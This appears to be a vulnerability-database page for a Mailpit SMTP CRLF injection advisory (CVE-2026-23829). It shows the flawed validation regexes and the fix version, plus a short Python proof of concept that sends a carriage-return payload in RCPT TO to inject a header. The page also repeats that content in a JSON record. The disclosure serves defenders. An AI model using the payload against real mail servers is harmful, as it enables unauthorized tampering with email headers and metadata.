📄 Mailpit SMTP CRLF Injection_PACKETSTORM:214763

5.3 / 10

MEDIUM

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Description

A CRLF injection vulnerability exists in Mailpit's SMTP server versions prior to 1.28.3. The vulnerability allows attackers to inject arbitrary SMTP headers by including carriage return characters in email addresses due to insufficient regex validation...

Visit Original Source

Basic Information

ID PACKETSTORM:214763

Published Feb 2, 2026 at 00:00

Affected Product

Affected Versions Mailpit - SMTP CRLF Injection via Regex Bypass
Advisory ID: RO-26-004
CVE ID: CVE-2026-23829
Severity: Medium
Vendor: axllent
Product: Mailpit
Version: <= v1.28.2

Overview #

A CRLF Injection vulnerability exists in Mailpit's SMTP server. The vulnerability allows attackers to inject arbitrary SMTP headers by including carriage return characters (\r) in email addresses due to insufficient regex validation.

Vulnerability Details #

Affected Versions: <= v1.28.2

Root Cause: The regex patterns used to validate RCPT TO and MAIL FROM addresses fail to exclude \r and \n characters. The \v escape sequence inside a character class only matches Vertical Tab, not CR/LF.

Vulnerable Code: The vulnerability exists in internal/smtpd/smtpd.go:

rcptToRE = regexp.MustCompile(`(?i)TO: ?<([^<>\v]+)>( |$)(.*)?`)
mailFromRE = regexp.MustCompile(`(?i)FROM: ?<(|[^<>\v]+)>( |$)(.*)?`)

Exploitation Requirements #

Network access to SMTP port (default 1025)
No authentication required

Impact #

Remote attackers can exploit this vulnerability to:

Inject arbitrary SMTP headers
Corrupt email metadata and Received headers
Generate malformed .eml files
Violate RFC 5321 compliance

Proof of Concept #

import socket

def exploit():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 1025))
s.recv(1024)
s.send(b"EHLO test.com\r\n")
s.recv(1024)
s.send(b"MAIL FROM:<[email protected]>\r\n")
s.recv(1024)
# Injecting \r
payload = b"RCPT TO:<victim\rX-Injected: Yes>\r\n"
s.send(payload)
resp = s.recv(1024)
print(f"Server Response: {resp.decode()}") # Expect 250 OK
s.close()

exploit()

Solution #

Upgrade to Mailpit version 1.28.3 or later.

References #

GitHub Security Advisory GHSA-54wq-72mp-cq7c
CWE-93: CRLF Injection
CWE-150: Improper Neutralization of Escape Sequences

Timeline:

[2026-01-13] - Reported
[2026-01-15] - Fixed
[2026-01-17] - CVE Assigned
[2026-01-18] - Published

Credits: Omar Kurt

{
    "lastseen": "2026-02-02T18:33:49",
    "description": "A CRLF injection vulnerability exists in Mailpit's SMTP server versions prior to 1.28.3. The vulnerability allows attackers to inject arbitrary SMTP headers by including carriage return characters in email addresses due to insufficient regex validation...",
    "published": "2026-02-02T00:00:00",
    "modified": "2026-02-02T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Mailpit SMTP CRLF Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:214763",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-23829"
    ],
    "sourceData": "Mailpit - SMTP CRLF Injection via Regex Bypass\n    Advisory ID: RO-26-004\n    CVE ID: CVE-2026-23829\n    Severity: Medium\n    Vendor: axllent\n    Product: Mailpit\n    Version: <= v1.28.2\n    \n    \n    Overview #\n    \n    A CRLF Injection vulnerability exists in Mailpit's SMTP server. The vulnerability allows attackers to inject arbitrary SMTP headers by including carriage return characters (\\r) in email addresses due to insufficient regex validation.\n    \n    \n    Vulnerability Details #\n    \n    Affected Versions: <= v1.28.2\n    \n    Root Cause: The regex patterns used to validate RCPT TO and MAIL FROM addresses fail to exclude \\r and \\n characters. The \\v escape sequence inside a character class only matches Vertical Tab, not CR/LF.\n    \n    Vulnerable Code: The vulnerability exists in internal/smtpd/smtpd.go:\n    \n    rcptToRE = regexp.MustCompile(`(?i)TO: ?<([^<>\\v]+)>( |$)(.*)?`)\n    mailFromRE = regexp.MustCompile(`(?i)FROM: ?<(|[^<>\\v]+)>( |$)(.*)?`)\n    \n    \n    \n    Exploitation Requirements #\n    \n        Network access to SMTP port (default 1025)\n        No authentication required\n    \n    Impact #\n    \n    Remote attackers can exploit this vulnerability to:\n    \n        Inject arbitrary SMTP headers\n        Corrupt email metadata and Received headers\n        Generate malformed .eml files\n        Violate RFC 5321 compliance\n    \n    Proof of Concept #\n    \n    import socket\n    \n    def exploit():\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        s.connect((\"127.0.0.1\", 1025))\n        s.recv(1024)\n        s.send(b\"EHLO test.com\\r\\n\")\n        s.recv(1024)\n        s.send(b\"MAIL FROM:<[email protected]>\\r\\n\")\n        s.recv(1024)\n        # Injecting \\r\n        payload = b\"RCPT TO:<victim\\rX-Injected: Yes>\\r\\n\"\n        s.send(payload)\n        resp = s.recv(1024)\n        print(f\"Server Response: {resp.decode()}\")  # Expect 250 OK\n        s.close()\n    \n    exploit()\n    \n    \n    \n    Solution #\n    \n    Upgrade to Mailpit version 1.28.3 or later.\n    \n    \n    References #\n    \n        GitHub Security Advisory GHSA-54wq-72mp-cq7c\n        CWE-93: CRLF Injection\n        CWE-150: Improper Neutralization of Escape Sequences\n    \n    Timeline:\n    \n        [2026-01-13] - Reported\n        [2026-01-15] - Fixed\n        [2026-01-17] - CVE Assigned\n        [2026-01-18] - Published\n    \n    Credits: Omar Kurt",
    "sourceHref": "https://packetstorm.news/download/214763",
    "cvss": {
        "score": 5.3,
        "severity": "MEDIUM",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/214763/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply